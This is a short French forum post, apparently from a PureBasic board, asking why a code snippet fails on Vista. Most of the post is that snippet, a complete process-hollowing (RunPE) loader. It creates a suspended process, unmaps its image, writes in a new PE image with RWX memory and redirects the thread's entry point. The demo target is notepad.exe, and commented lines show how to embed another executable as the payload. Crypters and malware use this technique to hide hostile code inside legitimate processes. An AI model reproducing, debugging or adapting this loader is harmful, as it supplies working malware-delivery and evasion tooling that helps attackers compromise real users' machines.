Mais du coup quelqun a un code fonctionnel? Parce que sous vista, ce code ne semble pas marcher
:
Code : Tout sélectionner
Structure IMAGE_SECTION_HEADER
SecName.b[8]
StructureUnion
PhysicalAddr.l
VirtualSize.l
EndStructureUnion
VirtualAddress.l
SizeOfRawData.l
PointerToRawData.l
PointerToRelocations.l
PointerToLinenumbers.l
NumberOfRelocations.w
NumberOfLinenumbers.w
Characteristics.l
EndStructure
Procedure run_program(name$,buffer.l)
Startupinfo.STARTUPINFO
ProcessInfo.PROCESS_INFORMATION
Context.CONTEXT
BaseAddress.i
addr.i
Structure IMAGE_SECTION_HEADERS
sec.IMAGE_SECTION_HEADER[95]
EndStructure
*NtHeaders.IMAGE_NT_HEADERS
*Sections.IMAGE_SECTION_HEADERS
ret.l
ZeroMemory_(@Startupinfo,SizeOf(Startupinfo))
;CreateProcess, addr myname, 0, 0, 0, 0, CREATE_SUSPENDED, 0, 0, addr sinfo, addr pinfo
CreateProcess_(@name$,0,0,0,0,CREATE_SUSPENDED, 0, 0,@Startupinfo,@ProcessInfo)
ZeroMemory_(@Context,SizeOf(context))
Context\ContextFlags = #CONTEXT_INTEGER
GetThreadContext_(ProcessInfo\hThread, Context)
GetModuleHandle_(0)
ReadProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@addr,SizeOf(addr),#Null)
ZwUnmapViewOfSection_(ProcessInfo\hProcess,addr)
*adr.IMAGE_DOS_HEADER = Buffer
*NtHeaders = Buffer + *adr\e_lfanew
BaseAddress = VirtualAllocEx_(ProcessInfo\hProcess,*NtHeaders\OptionalHeader\ImageBase,*NtHeaders\OptionalHeader\SizeOfImage, #MEM_COMMIT | #MEM_RESERVE, #PAGE_EXECUTE_READWRITE)
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress,buffer,*NtHeaders\OptionalHeader\SizeOfHeaders,@ret)
*Sections = *NtHeaders\OptionalHeader + *NtHeaders\FileHeader\SizeOfOptionalHeader
For i = 0 To *NtHeaders\FileHeader\NumberOfSections-1
WriteProcessMemory_(ProcessInfo\hProcess,BaseAddress+*Sections\sec[i]\VirtualAddress,Buffer+*Sections\sec[i]\PointerToRawData,*Sections\sec[i]\SizeOfRawData,@ret)
Next
WriteProcessMemory_(ProcessInfo\hProcess,Context\Ebx+8,@BaseAddress,SizeOf(BaseAddress),#NUL)
Context\Eax = BaseAddress + *NtHeaders\OptionalHeader\AddressOfEntryPoint
Result = SetThreadContext_(ProcessInfo\hThread, Context)
ResumeThread_(ProcessInfo\hThread)
ProcedureReturn ProcessInfo\hProcess
EndProcedure
stream =ReadFile(#PB_Any, GetEnvironmentVariable("windir") + "\notepad.exe")
;size = ?endfile-?startfile
;*buffer = AllocateMemory(size)
;CopyMemory(?startfile,*buffer,size)
*buffer = AllocateMemory(Lof(stream))
ReadData(Stream, *Buffer, Lof(Stream))
CloseFile(stream)
idprocess = run_program(GetEnvironmentVariable("windir") + "\notepad.exe", *buffer)
Delay(2000)
TerminateProcess_(idprocess, 0)
DataSection
startfile:
;IncludeFile "C:\Windows\notepad.exe"
endfile:
EndDataSectionDésolé, je me suis trompé de balise, j'avais pas vus :/
